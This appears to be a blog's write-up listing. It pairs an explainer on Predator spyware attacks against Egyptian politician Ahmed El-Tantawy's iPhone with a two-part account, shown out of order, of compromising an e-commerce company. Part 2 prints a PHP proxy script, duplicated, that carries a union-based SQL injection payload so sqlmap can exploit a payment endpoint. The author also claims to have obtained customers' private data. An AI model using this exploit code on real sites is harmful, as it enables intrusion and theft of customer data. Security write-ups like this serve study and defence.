A dirty smell in Egyptian politician iPhone

This happens in Egypt, A former member of the Egyptian parliament who decided to participate in the upcoming Egyptian presidential election of 2024 called Ahmed El-Tantawy, his mobile phone got hacked. This was not the first time for El-Tantawy’s phone to get hacked.

In this write up I will try to simplify as much as possible what happened to Ahmed El-Tantawy iPhone to be compromised.
All the information mentioned here are gathered from the references listed by the end of this page.

Institutions

I will mention few institutions and individuals who are involved in the hacking attempt either directly or indirectly.

Cytrox: A company established in 2017 that makes malwares used for cyberattacks and covert surveillance.
The company was established by an Isrealy cyber security engineer called “Rotem Farkash” who served for years in the IDF (Israel Defense Forces) as per crunchbase website.
Predator: A spyware developed by Cytrox that targets the Android and iOS operating systems.
CitizenLab: Citizen Lab is a laboratory based at the Munk School of Global Affairs in University of Toronto, Canada. The lab focuses on the study of digital threats to civil society and high-level policy engagement.
TAG: Google’s Threat Analysis Group is a dedicated team that analyze and monitor the malicious actors attacks and responsible for patching the published and new discovered vulnerabilities.
Egypt: Represents the Egyptian government and the decision makers for the actions that was taken in the field of cyber security.
Ayman Nour: A former member of the Egyptian political opposition living in exile in Turkey.
Ahmed El-Tantawy: A former Egyptian member of the Parliament who previously served as the chairman of an Egyptian opposition political party called “al-Karama”.
Apple: The very known company that creates iPhones, iPads, Apple watches and many other products including their famous operating system iOS.
Vodafone: A British multinational telecommunications company that operates in multiple countries around the world including Egypt.

Timeline

The below list includes the timeline of the events:

15 Sep 2021: Tantawy’s iPhone was infected through an SMS that contains Predator spyware download URL.
May 2023: Tantawy receives a malicious SMS that contains predator spyware download URL.
24 June 2023: Tantawy receives a malicious Whatsapp message that contains Predator spyware download URL.
12 July 2023: Tantawy receives another malicious Whatsapp message that contains predator spyware download URL.
September 2023: Tantawy receives another malicious SMS that contains predator spyware download URL.
August – September 2023: Tabtawy personal iPhone was targeted with a network injection attack that was originated from Egyptian Vodafone network.
September 2023: Tantawy suspects his phone got hacked and turns to Citizen lab to request forensic investigation on his phone.
September 2023: Citizen Lab do the investigation on Tantawy’s iPhone and reported all the discovered attack scenarios and CVEs accusing the Egyptian government to be responsible about the attack with high confidence.
September 2023: Citizen Lab reported to Apple three zero-days that have been used and discovered during their investigation on Tantawy’s iPhone.
5 September: TAG fix a zero-day that is used by predator spyware against android devices which was separately reported to the Chrome vulnerability rewards program by a security researcher.
21 September 2023: Apple push a new iOS update version that fix the three zero-days that were used by predator spyware and reported by Citizen Lab.

Remote Operation until last access (Part 2)

In Part 1, I outlined how during this Operation, I discovered an outdated WordPress. I researched plugins and the theme that were installed on the WordPress script and obtained reflected XSS, partially Local File Include, and time-based SQL injection.

If this was a normal pentest, this would be the end. I would write up the findings and recommendations. However, this was a remote operation. I was assessing a large corporation I am calling Target Corporate.

SQL Injection Exploitation

In Part 1, I used a Local File Include that turned to be useful to include a page that is vulnerable to SQL injection, I also created a POC regarding the SQL injection, In this part, I will explain how the time-based SQL injection was exploited.

I used the SQLMAP tool but the vulnerability can not be directly exploitable by SQLMAP, thus, I had to create a PHP page that acts as a proxy between SQLMAP and the vulnerable page and created the injection point that will be used by SQLMAP to launch successful exploitation.

<?php
$url="https://*********************";
$injection=$_GET['inj'];

post_it($url,$injection);

function post_it($url,$injection){
        $ch = curl_init();
        $post="custom=2' or 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$injection."-- -|sssssss";

        curl_setopt($ch, CURLOPT_URL, "$url/?payment_response=paypal_response");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,
            $post);

        //return the transfer as a string
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        echo $output;
        curl_close($ch);
}
?>

<?php

$url="https://*********************";

$injection=$_GET['inj'];

post_it($url,$injection);

function post_it($url,$injection){

$ch = curl_init();

$post="custom=2' or 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$injection."-- -|sssssss";

curl_setopt($ch, CURLOPT_URL, "$url/?payment_response=paypal_response");

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS,

$post);

//return the transfer as a string

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$output = curl_exec($ch);

echo $output;

curl_close($ch);

}

The PHP page will be hosted on my localhost, it contains a user input called $inj that will be used to send the SQL injection payloads to the targeted vulnerable input in a good manner, I made it exploitable for SQLMAP to inject its time-based SQL injection payloads.

Remote Operation until last access (Part 1)

In this post, I will chronicle a remote operation that was executed. The operation took many weeks to achieve its target, I went from minimal information about the corporate into the total compromise of all customer’s users private information. The target is a large corporate with a sizable security program. For purposes of this blog, I will call them Target Corporate.

Target Corporate is a big E-commerce company that works in multiple countries. In this operation, I needed to do Web application Recon, source code review, exploitation, lateral movement and social engineering.

Let’s start

When I began this operation, I typically know nothing about their infrastructure operations. I needed to research the corporate and learn as much about their internal operations as possible.

I needed to look for outdated softwares and services that can be exploited. Maybe some applications with default passwords or custom web applications that might be vulnerable, looking for any resources that may be useful to gain more information.

Recon Phase

I spent hours doing recon at the target external systems. There were no obvious exploitable vulnerabilities on any of the applications that have been discovered. I found numerous web services and spent time investigating them. There was nothing in these tiny services.

I used Google search engine in addition to multiple tools to enumerate any reachable subdomains regarding Target Corporate, the most interesting subdomains were:

management.target.com (A software to Control customer data and transactions)
gmail.target.com (A software that is supported by google mail to provide a secure email login)
wordpress.target.com (WordPress software installed)

(Those are not the real names of the subdomains)

Ahmed Elselhab Blog

My write ups

Category: writeup